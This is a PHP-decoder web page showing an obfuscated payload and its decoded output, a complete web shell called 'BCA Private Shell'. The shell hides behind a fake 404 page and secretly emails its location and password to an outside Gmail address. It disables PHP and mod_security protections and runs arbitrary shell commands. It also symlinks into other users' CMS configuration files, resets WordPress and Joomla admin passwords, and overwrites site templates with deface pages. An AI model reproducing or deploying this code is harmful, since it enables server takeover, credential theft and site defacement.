Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $X= eval(gzinflate(base64_decode('7X1pd+JIsuj3Pqf/g1rtNnCLYjPey55mtcF4Y/NSrsMIJECg..
Decoded Output download
$auth_pass = "";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH','__FILE__');
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION','2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ?array_map('stripslashes_array',$array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
;echo '
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at ';echo $_SERVER['HTTP_HOST'];echo ' Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
';
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) &&( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$enable_wp = true;
$enable_joomla = true;
$enable_vb = false;
$enable_phpbb = false;
$enable_ipb = false;
$bcabuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
eval(base64_decode($bcabuff));
if(isset($_SESSION['safechk'])){
if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
$byphp = "safe_mode = Off
disable_functions =
safe_mode_gid = OFF
open_basedir = OFF
allow_url_fopen = On";
$byht = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule>";
file_put_contents("php.ini",$byphp);
file_put_contents(".htaccess",$byht);
$_SESSION['safechk'] = "done";
die("PHP Safe Mode ByPassed. Please Refresh This page");
}
}
function convertByte($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
function curPageURL() {
$pageURL = 'http';
if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
$pageURL .= "://";
if ($_SERVER["SERVER_PORT"] != "80") {
$pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
}else {
$pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
}
return $pageURL;
}
function chkDis($link,$str){
$lol = get_headers($link,1);
if(strpos($lol[0],"200")){
$nan = file_get_contents($link);
if(strpos($nan,$str)){
return true;
}else{return false;}
}else{return false;}
}
function getDnamed(){
if(is_readable("/var/named")){
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$i += 1;
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dn[$owner['name']] = $domain;
}
}
}
return $dn;
}
function chkSys($link){
$sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
"Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
);
foreach($sys_arr as $k=>$dan){
if(chkDis($link.$dan['l'],$dan['s'])){
return array('link'=>$link.$dan['l'],'cms'=>$k);
}
}
}
function EloFind($str,$start,$end){
$len = strlen($str);
$start_pos = (strpos($str,$start) +strlen($start));
$str = substr($str,$start_pos);
$end_pos = strpos($str,$end);
$str = substr($str,0,$end_pos);
return $str;
}
function GetPage($url,$cookie,$post = null,$head = true) {
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_HEADER,$head);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
If ($post != NULL){
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
}
$urlPage = curl_exec($ch);
if(curl_errno($ch)){
echo curl_error($ch);
}
curl_close($ch);
return($urlPage);
}
function throwErr($str){
$arr = array("status"=>"error","msg"=>$str);
die(json_encode($arr));
}
function add2file($file,$str){
if(file_exists($file)){
$do = file_get_contents($file);
if(!strpos($do,$str)){
file_put_contents($file,$str,FILE_APPEND);
}
}else{
file_put_contents($file,$str,FILE_APPEND);
}
}
function doXploitWP($cnf,$html,$npass){
$success = false;
$str = file_get_contents($cnf);
if(preg_match('%DB_USER%',$str)){
$username=EloFind($str,"define('DB_USER', '","');");
$password=EloFind($str,"define('DB_PASSWORD', '","');");
$dbname=EloFind($str,"define('DB_NAME', '","');");
$prefix=EloFind($str,"table_prefix = '","'");
$link=mysql_connect("localhost",$username,$password) ;
if ($link) {
mysql_select_db($dbname,$link) ;
$req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
$req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
}else{
throwErr("Mysql Fail");
}
$status['site'] = $site_url;
$cookie = 'cookie/'.md5($cnf).'.txt';
@unlink($cookie);
$logged_in = true;
$url = $site_url."/wp-login.php";
$postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
$logme = GetPage($url,$cookie,$postme);
if(!preg_match('%logout%',$logme)){
file_put_contents("login.txt",$site_url.$logme);
throwErr("Login Error");
}
if($logged_in){
$url = $site_url."/wp-admin/theme-editor.php";
$themeditor = GetPage($url,$cookie,null);
$nola = explode(Chr(10),$themeditor);
foreach($nola as $nline){
if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
$modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
}
}
if(is_array($modify)){
foreach($modify as $met=>$indfile){
$nri = str_replace('.','_',$met);
$nri = "n".$nri;
if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
$indfile =str_replace("&","&",$indfile);
$url = trim($site_url."/wp-admin/".$indfile);
$themepage = GetPage($url,$cookie,"");
$_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
$_file = EloFind($themepage,'name="file" value="','"');
$nfile = explode('themes',$_file);
$jfile = $site_url."/wp-content/themes".end($nfile);
$url = $site_url."/wp-admin/theme-editor.php";
$postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
$themedied = GetPage($url,$cookie,$postme);
if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
if(!$success){
add2file("wp_site.txt",$jfile.Chr(10));
}
$success = true;
if($met == "index.php"){
add2file("wp_index.txt",$site_url.Chr(10));
}
}else{
$error = true;
}
}
}
}else{
throwErr("No file found");
}
if($success){
$url = trim($site_url."/wp-admin/profile.php");
$themepage = GetPage($url,$cookie,"");
$_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
$url = trim($site_url."/wp-admin/profile.php");
$postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&[email protected]&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
$themepage = GetPage($url,$cookie,$postme);
$status['status'] = "success";
die(json_encode($status));
}
else{
if($error){
throwErr("Could't Update the file");
}else{
throwErr("Selected file not found");
}
}
}
}else{
throwErr("Config not found");
}
return true;
}
function doXploitJM($cnf,$html,$npass){
function joomlaCom($site_url,$cookie,$site){
if($_POST['com_install'] == "on"){
$url = $site_url ."/index.php?option=com_installer";
$compage = GetPage($url,$cookie);
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
$hash = $dhash[1];
preg_match_all('#value="/(.*?)"#s',$compage,$path);
foreach($path[0] as $pathx){
$pathx=ereg_replace('value="','',$pathx);
$pathx=ereg_replace('"','',$pathx);
}
$dir = getcwd()."/bca.html";
$postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
$url = $site_url ."/index.php?option=com_installer";
$com_shell = GetPage($url,$cookie,$postme);
if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
add2file("jm_site.txt",$site."/tmp/bca.html".Chr(10));
$status['site'] = $site."/tmp/bca.html";
$status['status'] = "success";
die(json_encode($status));
}else{
return false;
}
}
return true;
}
$str = file_get_contents($cnf);
if(preg_match('%(JConfig|mosConfig)%',$str)){
if(preg_match('%JConfig%',$str)){
$username=EloFind($str,"\$user = '","'");
$password=EloFind($str,"\$password = '","'");
$dbname=EloFind($str,"\$db = '","'");
$prefix=EloFind($str,"\$dbprefix = '","'");
$pwd = md5($npass);
if($_POST['domain'] != "..."){
$site_url = $_POST['domain'];
$site_url = "http://".$site_url;
}else{
$mailto = EloFind($str,"\$mailfrom = '","'");
$siteul = explode('@',$mailto);
$site_url = "http://".$siteul[1];
}
}elseif(preg_match('%mosConfig%',$str)){
$username=EloFind($str,"\$mosConfig_user = '","'");
$password=EloFind($str,"\$mosConfig_password = '","'");
$dbname=EloFind($str,"\$mosConfig_db = '","'");
$prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
$pwd = md5($npass);
if($_POST['domain'] != "..."){
$site_url = $_POST['domain'];
$site_url = "http://".$site_url;
}else{
$mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
$siteul = explode('@',$mailto);
$site_url = "http://".$siteul[1];
}
}
$site = $site_url;
$site_url = $site_url."/administrator/";
$cookie = 'cookie/'.md5($cnf).'.txt';
@unlink($cookie);
$link=mysql_connect("localhost",$username,$password) ;
if ($link) {
mysql_select_db($dbname,$link);
$changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
$doit =mysql_query("SELECT * from `".$prefix."extensions` ");
if($doit){
if($_POST['ignore_def'] == "on"){
$req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
if(strlen($template_name) <1){
$req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
}
}
else{
$req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
}
$req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
$data = mysql_fetch_array($req);
$template_id=$data["extension_id"];
$url = $site_url ."index.php";
$login_page = GetPage($url,$cookie);
$rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
$hash = $dhash[1];
$url = $site_url ."index.php";
$postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
$logginin = GetPage($url,$cookie,$postme);
if(preg_match('%logout|index2\.php%',$logginin)){
$logged_in = true;
}
if(!$logged_in){
file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
throwErr("Login Error");
}
if($logged_in){
joomlaCom($site_url,$cookie,$site);
$url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
$themepage = GetPage($url,$cookie);
if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
$hash = $dhash[1];
$url = $site_url."/index.php?option=com_templates&layout=edit";
$postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
$themeedit = GetPage($url,$cookie,$postme);
if(preg_match('%class=\"message message\"%',$themeedit)){
add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
add2file("jm_index.txt",$site.Chr(10));
if($_POST['ignore_def'] == "on"){
$status['site'] = $site."/templates/".$template_name."/index.php";
}else{
$status['site'] = $site;
}
$status['status'] = "success";
die(json_encode($status));
}
else{
throwErr("Update failed");
}
}
else{
throwErr("Index not found");
}
}
}else{
$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
$data = mysql_fetch_array($req);
$template_name=$data["template"];
$url = $site_url ."index.php";
$login_page = GetPage($url,$cookie);
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
$hash = $dhash[1];
$postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
$url = $site_url ."index.php";
$logginin = GetPage($url,$cookie,$postme);
if(preg_match('%logout|index2\.php%',$logginin)){
$logged_in = true;
}
if(!$logged_in){
file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
throwErr("Login Error");
}
if($logged_in){
joomlaCom($site_url,$cookie,$site);
if(preg_match('%index2\.php%',$logginin)){
$url = $site_url ."index2.php";
$logginin = GetPage($url,$cookie);
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
$hash = $dhash[1];
$url = $site_url ."/index2.php";
$postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
$themepage = GetPage($url,$cookie,$postme);
if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
$hash = $dhash[1];
$url=$site_url."/index2.php";
$postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
$themeedit = GetPage($url,$cookie,$postme);
if(preg_match('%Template Manager%',$themeedit)){
add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
add2file("jm_index.txt",$site.Chr(10));
$status['site'] = $site;
$status['status'] = "success";
die(json_encode($status));
}
else{
file_put_contents("jmupd.txt",$site_url.$themeedit);
throwErr($template_name);
}
}else{
throwErr("Index not found");
}
}
else{
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
$hash = $dhash[1];
$url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
$themepage = GetPage($url,$cookie);
if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
$hash = $dhash[1];
$url=$site_url."/index.php?option=com_templates&layout=edit";
$postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
$themeedit = GetPage($url,$cookie,$postme);
if(preg_match('%class=\"message message fade\"%',$themeedit)){
add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
add2file("jm_index.txt",$site.Chr(10));
$status['site'] = $site;
$status['status'] = "success";
die(json_encode($status));
}
else{
file_put_contents("jmupd.txt",$site_url.$themeedit);
throwErr($template_name);
}
}else{
throwErr("Index not found");
}
}
}
}
}
else{
throwErr("Mysql Fail");
}
}
else{
throwErr("Config not found");
}
}
function doXploitVB($cnf,$html){
$str = file_get_contents($cnf);
if(preg_match('%vBulletin%',$str)){
$username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
$password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
$dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
$prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
$link=mysql_connect("localhost",$username,$password) ;
if ($link) {
mysql_select_db($dbname,$link);
$html = str_replace('"','\"',$html);
$query = "UPDATE template SET template = '".$html."'";
$result =@ mysql_query($query);
if($result){
$query = "SELECT * FROM `datastore` WHERE title = 'options'";
$result =@ mysql_query($query);
$data = mysql_fetch_array($result);
$optionz=$data["data"];
$site_url = EloFind($optionz,'"bburl";s:34:"','"');
$status['site'] = $site_url;
$status['status'] = "success";
die(json_encode($status));
}else{
throwErr("Update Failed");
}
}else{
throwErr("Mysql Fail");
}
}else{
throwErr("Config not found");
}
}
function exme($in) {
$out = '';
if (function_exists('exec')) {
@exec($in,$out);
$out = @join("</br>",$out);
}elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
if($_POST['ac'] == "secinfo"){
if(is_readable("/etc/named.conf")){
echo '» /etc/named.conf is readable.<br />';
}else{
echo '» <font color="red">/etc/named.conf not readable</font> <br />';
}
if(is_readable("/etc/passwd")){
echo '» /etc/passwd is readable.<br />';
}else{
echo '» <font color="red">/etc/passwd not readable</font> <br />';
}
if(is_readable("/etc/valiases")){
echo '» /etc/valiases exists';
if(is_array(scandir("/etc/valiases"))){
echo ' & scanable';
}
echo '.<br />';
}else{
echo '» <font color="red">/etc/valiases not readable</font> <br />';
}
if(is_readable("/var/named")){
echo '» /var/named exists';
if(is_array(scandir("/var/named"))){
echo ' & scanable';
}
echo '.<br />';
}else{
echo '» <font color="red">/var/named not readable</font> <br />';
}
if(ini_get('disable_functions')){
echo '» '.ini_get('disable_functions').' are disabled<br />';
}
if(function_exists("symlink")){
echo '» Symlinking allowed<br />';
}else{
echo '» <font color="red">Symlinking not allowed</font> <br />';
}
if(is_writable("/var/tmp")){
echo '» /var/tmp folder is writable<br />';
}
if(is_readable('/var/log')){
echo '» /var/log folder is readable<br />';
}
die();
}
elseif($_POST['ac'] == "sysinfo"){
echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
$ssys = "None";
if(is_dir("/usr/local/cpanel")){
$ssys = "Running On Cpanel";
}elseif(is_dir("/usr/local/directadmin")){
$ssys = "Running On Directadmin";
}
echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
if(function_exists("disk_total_space")){
echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
}
echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
die();
}
elseif($_POST['ac'] == "browse"){
error_reporting(0);
if($_POST['path'] != ""){
$path = $_POST['path'];
}else{
$path = getcwd();
}
$filez = scandir($path);
$q = 2;
foreach($filez as $mfile){
if($q == 2){$q = 1;}else{$q = 2;}
$npath = $_POST['path'].$mfile;
$stat = stat($npath);
$usr = posix_getpwuid($stat['uid']);
$grp = posix_getpwuid($stat['gid']);
if(is_dir($npath)){
$size = "Dir";
}else{
$size = convertByte($stat['size']);
}
$fperm = substr(sprintf('%o',fileperms($npath)),-4);
if(!$fperm){
$fperm = "<font color='red'>Restricted</font>";
}elseif(is_writeable($npath)){
$fperm = "<font color='#28FE14'>".$fperm."</font>";
}elseif(is_readable($npath)){
$fperm = "<font color='yellow'>".$fperm."</font>";
}
echo '<div class="filetable">
<div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
<div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
<div class="tblbx'.$q.'" style="width:100px;">Modify</div>
<div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
<div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
<div class="tblbx'.$q.'" style="width:80px;">Action</div>
</div>';
}
die();
}
elseif($_POST['ac'] == "chknamed"){
error_reporting(0);
if(is_readable("/etc/named.conf")){
$named = file_get_contents("/etc/named.conf");
preg_match_all('%zone \"(.*)\" {%',$named,$domains);
foreach($domains[1] as $domain){
$domain = trim($domain);
$i += 1;
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
}
echo "Total Domains Found: ".$i."<br />".$dn;
die();
}
elseif(is_readable("/etc/valiases")){
$list = scandir("/etc/valiases");
foreach($list as $domain){
$i += 1;
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
}
echo "Total Domains Found: ".$i."<br />".$dn;
die();
}
elseif(is_readable("/var/named")){
$list = scandir("/var/named");
foreach($list as $domain){
if(strpos($domain,".db")){
$i += 1;
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
$dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
}
}
echo "Total Domains Found: ".$i."<br />".$dn;
die();
}
else{
die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
}
}
elseif($_POST['ac'] == "safebypass"){
$byphp = "safe_mode = Off
disable_functions =
safe_mode_gid = OFF
open_basedir = OFF
allow_url_fopen = On";
$byht = "<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule>";
file_put_contents("php.ini",$byphp);
file_put_contents(".htaccess",$byht);
echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
die();
}
elseif($_POST['ac'] == "chkph"){
if(is_readable("/etc/passwd")){
if(!is_dir("bca")){
@mkdir('bca',0777);
}
$htaccss = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
file_put_contents("bca/.htaccess",$htaccss);
$etc = file_get_contents("/etc/passwd");
$etcz = explode("
",$etc);
foreach($etcz as $etz){
$etcc = explode(":",$etz);
error_reporting(0);
if($enable_wp){
symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
}
if($enable_phpbb){
symlink('/home/'.$etcc[0].'/public_html/config.php',"bca/".$etcc[0].'-PhpBB.txt');
}
if($enable_vb){
symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"bca/".$etcc[0].'-vBulletin.txt');
}
if($enable_joomla){
symlink('/home/'.$etcc[0].'/public_html/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
}
}
$lol = explode("/",curPageURL());
$link = str_replace(end($lol),"",curPageURL());
$str = file_get_contents($link."/bca");
preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
if(is_array($exp[2])){
$q = 2;
$dmn = getDnamed();
foreach($exp[2] as $sitez){
if($q == 2){$q = 1;}else{$q = 2;}
$j += 1;
$sn = explode("-",$sitez);
$domain = $dmn[$sn[0]];
if($domain){
$domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
}else{
$domain = "<a id='inj_dom".$j."' href=''>...</a>";
}
$nan .= '<div id="inj'.$j.'">
<div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
<div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$j.'">'.$domain.'</div>
<div class="tblbx'.$q.'" style="width:160px;"><a id="injst'.$j.'" class="conf" href="'.$link.'bca/'.$sitez.'.txt" title="'.$j.'">'.ucfirst($sn[1]).'</a></div>
<div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$j.'" title="On Idle...">Idle...</div>
</div>';
}
$cnt = '<input type="text" style="display:none" id="sitecount" value="'.$j.'">';
echo $nan.$cnt;
}
}
die();
}
elseif($_POST['ac'] == "chkph2"){
if(is_readable("/etc/passwd")){
if(!is_dir("bca")){
@mkdir('bca',0777);
}
if(!is_link("bca/root")){
$sym = symlink("/","bca/root");
if(!$sym){
die("Symlink method failed.");
}
}
$htaccss = "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any";
file_put_contents("bca/.htaccess",$htaccss);
$etc = file_get_contents("/etc/passwd");
$etcz = explode("
",$etc);
$lol = explode("/",curPageURL());
$link = str_replace(end($lol),"",curPageURL());
@unlink("rootinject.tmp");
$q = 2;
$dmn = getDnamed();
foreach($etcz as $etz){
$etcc = explode(":",$etz);
$dr = "bca/root/home/".$etcc[0]."/public_html/";
$dan = chkSys($link.$dr);
if($dan){
if($q == 2){$q = 1;}else{$q = 2;}
$domain = $dmn[$etcc[0]];
if($domain){
$domain = "<a id='inj_dom".$k."' href='http://".$domain."'>".$domain."</a>";
}else{
$domain = "<a id='inj_dom".$k."' href=''>...</a>";
}
$k += 1;
$nant = '<div id="inj'.$k.'">
<div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$k.'"onClick="doToggle(\''.$k.'\');">'.$etcc[0].'<input style="display:none;" type="checkbox" id="injchk'.$k.'" checked></div>
<div class="tblbx'.$q.'" style="width:220px;" id="inj_domain'.$k.'">'.$domain.'</div>
<div class="tblbx'.$q.'" style="width:160px;"><a class="conf" href="'.$dan['link'].'">'.$dan['cms'].'</a></div>
<div class="tblbx'.$q.'" style="width:120px;" id="inj_status'.$k.'">Idle...</div>
</div>';
file_put_contents("rootinject.tmp",$nant,FILE_APPEND);
$nan .= $nant;
}
}
$cnt = '<input type="text" style="display:none" id="sitecount" value="'.$k.'">';
echo $nan.$cnt;
}
die();
}
elseif($_POST['ac'] == "inject"){
error_reporting(0);
$cms = strtolower($_POST['cms']);
$cnf = $_POST['conf'];
if(file_exists(md5($_POST['deface_page']))){
$html = file_get_contents(md5($_POST['deface_page']));
}else{
$html = file_get_contents($_POST['deface_page']);
file_put_contents(md5($_POST['deface_page']),$html);
file_put_contents("bca.html",$html);
}
if(!is_dir("cookie")){
@mkdir("cookie",0777);
}
switch($cms){
case "wordpress":
doXploitWP($cnf,$html,"uradhura123");
break;
case "joomla":
doXploitJM($cnf,$html,"uradhura123");
break;
case "vbulletin":
doXploitVB($cnf,$html);
break;
case "phpbb":
break;
case "ipb":
break;
case "mybb":
break;
case "oscommerce":
break;
case "smf":
break;
case "drupal":
break;
case "seditio":
break;
case "e107":
break;
}
throwErr("Not Added");
}
elseif($_POST['ac'] == "ssh"){
$ssh = exme($_POST['command']);
die(nl2br($ssh));
}
elseif($_POST['ac'] == "phpinfo"){
$php = phpinfo();
die($php);
}
;echo '<html>
<title>BCA Private Shell</title>
<head>
